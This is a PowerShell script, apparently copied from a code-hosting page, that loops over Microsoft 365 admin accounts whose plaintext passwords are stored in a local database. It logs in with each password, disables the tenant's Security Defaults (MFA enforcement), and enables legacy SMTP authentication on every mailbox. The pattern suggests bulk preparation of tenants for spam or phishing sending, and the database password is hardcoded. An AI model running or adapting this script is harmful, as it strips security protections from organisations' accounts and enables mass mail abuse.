83 lines
3.2 KiB
PowerShell
83 lines
3.2 KiB
PowerShell
#!/usr/bin/env pwsh
|
|
$ErrorActionPreference = "Continue"
|
|
$env:PGPASSWORD = "admin123"
|
|
|
|
# Get Ismael accounts (Active status, valid password, own tenant admin)
|
|
$csv = & psql -h localhost -U admin -d adx_system -t -A -F '|' -c @"
|
|
SELECT admin_email, admin_password, tenant_domain
|
|
FROM office_accounts
|
|
WHERE source = 'Ismael'
|
|
AND LOWER(status) IN ('active')
|
|
AND admin_password IS NOT NULL AND admin_password != ''
|
|
AND admin_email NOT LIKE 'sysadmin_%'
|
|
AND tenant_domain LIKE '%.onmicrosoft.com'
|
|
ORDER BY id
|
|
LIMIT 10
|
|
"@
|
|
|
|
$ok = 0; $fail = 0
|
|
|
|
foreach ($line in $csv) {
|
|
if ([string]::IsNullOrWhiteSpace($line)) { continue }
|
|
$parts = $line.Split('|')
|
|
$email = $parts[0].Trim()
|
|
$pw = $parts[1].Trim()
|
|
$tenant = $parts[2].Trim()
|
|
|
|
Write-Host "[$($ok+$fail+1)] $email ($tenant)"
|
|
|
|
try {
|
|
# Step 1: Get token via ROPC flow
|
|
$tokenBody = @{
|
|
grant_type = "password"
|
|
client_id = "1b730954-1685-4b74-9bfd-dac224a7b894"
|
|
resource = "https://graph.microsoft.com"
|
|
username = $email
|
|
password = $pw
|
|
scope = "openid"
|
|
}
|
|
$tokenResp = Invoke-RestMethod -Method POST -Uri "https://login.microsoftonline.com/$tenant/oauth2/token" -Body $tokenBody -ErrorAction Stop
|
|
$token = $tokenResp.access_token
|
|
Write-Host " Token: OK"
|
|
|
|
$headers = @{
|
|
Authorization = "Bearer $token"
|
|
"Content-Type" = "application/json"
|
|
}
|
|
|
|
# Step 2: Check Security Defaults status
|
|
$sdResp = Invoke-RestMethod -Uri "https://graph.microsoft.com/v1.0/policies/identitySecurityDefaultsEnforcementPolicy" -Headers $headers -ErrorAction Stop
|
|
Write-Host " Security Defaults: isEnabled=$($sdResp.isEnabled)"
|
|
|
|
if ($sdResp.isEnabled) {
|
|
# Disable Security Defaults
|
|
$disableBody = '{"isEnabled":false}'
|
|
Invoke-RestMethod -Method PATCH -Uri "https://graph.microsoft.com/v1.0/policies/identitySecurityDefaultsEnforcementPolicy" -Headers $headers -Body $disableBody -ErrorAction Stop
|
|
Write-Host " -> DISABLED Security Defaults"
|
|
}
|
|
|
|
# Step 3: Enable SMTP AUTH via Exchange
|
|
$secPwd = ConvertTo-SecureString $pw -AsPlainText -Force
|
|
$cred = New-Object System.Management.Automation.PSCredential($email, $secPwd)
|
|
Connect-ExchangeOnline -Credential $cred -ShowBanner:$false -ErrorAction Stop
|
|
Set-TransportConfig -SmtpClientAuthenticationDisabled $false -ErrorAction Stop
|
|
$mbs = Get-CASMailbox -ResultSize Unlimited
|
|
foreach ($mb in $mbs) {
|
|
Set-CASMailbox -Identity $mb.Identity -SmtpClientAuthenticationDisabled $false -ErrorAction SilentlyContinue
|
|
}
|
|
Write-Host " Exchange: SMTP AUTH enabled ($($mbs.Count) mailboxes)"
|
|
Disconnect-ExchangeOnline -Confirm:$false -ErrorAction SilentlyContinue
|
|
|
|
$ok++
|
|
}
|
|
catch {
|
|
$err = $_.Exception.Message
|
|
Write-Host " FAIL: $($err.Substring(0, [Math]::Min(100, $err.Length)))"
|
|
Disconnect-ExchangeOnline -Confirm:$false -ErrorAction SilentlyContinue
|
|
$fail++
|
|
}
|
|
}
|
|
|
|
Write-Host "`n=== RESULT: $ok OK, $fail FAILED ==="
|
|
|
|
EOF_PS 2>&1 |